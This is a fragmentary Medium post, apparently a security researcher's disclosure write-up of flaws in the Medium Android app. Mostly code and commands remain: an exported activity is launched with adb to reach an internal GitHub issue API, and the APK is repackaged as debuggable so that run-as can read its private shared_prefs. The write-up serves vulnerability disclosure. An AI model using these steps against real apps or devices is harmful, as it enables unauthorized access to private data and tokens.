Medium Hacking Stories #1: Access to Internal API calls via Camouflaged GitHub Activity

Hacking Medium #1: Exported Android Activity Fiasco

Medium Hacking Stories by Piyush Raj ~ Rex (0x48piraj)
<manifest ... >
<application ... >
<activity android:name=".ExampleActivity" />
...
</application ... >
...
</manifest >

Summary

public interface GithubApi {
@POST(“repos/Medium/tickets/issues”)
Observable<ResponseBody> createIssue(@Header(“Authorization”) String str, @Body CreateGithubIssueRequest createGithubIssueRequest);
}
$ adb shell am start -n com.medium.reader/com.medium.android.donkey.meta.gitout.GitOutActivity

Exploit In Action

InvokeGitOutActivity Proof of Concept’s Result

Where’s the token then?

cd /data/data/com.medium.reader/shared_prefs
su -c cat *.xml
0x48piraj~Rex:/ $ ls /data/data/com.medium.reader
ls: /data/data/com.medium.reader: Permission denied
0x48piraj~Rex:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0

Say hello to “Debuggable”

android:debuggable, FTW!
$ apktool d com.medium.reader.apk
<manifest ...>
...
<application ... android:debuggable="true">
...
</application>
</manifest>
$ apktool b com.medium.reader/ -o com.medium.reader.modified.apk
$ java -jar sign.jar com.medium.reader.modified.apk
$ adb install com.medium.reader.modified.apk
$ adb run-as com.medium.reader
> ls
cache
code_cache
lib
shared_prefs
> id
id=10170(u0_a170) gid=10170(u0_a170) groups=10170(u0_a170),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:untrusted_app:s0:c170,c256,c512,c768

Aftermaths

I will release other chained bugs as soon the case is closed and all the vulnerabilities are mitigated.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Piyush Raj ~ Rex

Google Code-In C. Winner. GsOCer ‘19. Independent Security Researcher. Have hacked Medium, Mozilla, Opera & many more. Personal Website: https://0x48piraj.com